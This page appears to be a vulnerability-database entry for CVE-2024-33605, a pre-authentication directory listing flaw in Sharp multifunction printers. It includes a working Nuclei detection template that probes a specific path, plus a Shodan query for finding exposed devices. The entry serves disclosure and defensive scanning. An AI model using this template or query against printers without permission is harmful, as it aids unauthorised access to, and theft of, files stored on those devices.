漏洞描述
It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
CVE-2024-33605: Sharp Multifunction Printers - Directory Listing
PoC代码[已公开]
id: CVE-2024-33605
info:
name: Sharp Multifunction Printers - Directory Listing
author: gy741
severity: high
description: |
It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
remediation: |
Apply all relevant security patches and product upgrades.
reference:
- https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-arbitrary-directory-listing
- https://jvn.jp/en/vu/JVNVU93051062/index.html
- https://global.sharp/products/copier/info/info_security_2024-05.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-33605
cwe-id: CWE-22
epss-score: 0.56595
epss-percentile: 0.98051
cpe: cpe:2.3:o:sharp:mx-3550v_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "Set-Cookie: MFPSESSIONID="
product: mx-3550v_firmware
vendor: sharp
tags: cve,cve2024,sharp,printer,traversal
http:
- method: GET
path:
- "{{BaseURL}}/installed_emanual_list.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ServiceEmanualList'
- '/installed_emanual_down.html'
condition: and
- type: word
part: header
words:
- "Set-Cookie: MFPSESSIONID="
- type: status
status:
- 200
# digest: 4a0a00473045022100ecc2736852f6d6d868c67ef8b92b86cec9f0d1451581a7511a81f8e7d44ebc96022029464d3d36bc5df2bbc34aa7eed728d47f9e798dda3e45d0c6dbf244f6e56aa4:922c64590222798bb761d5b6d8e72950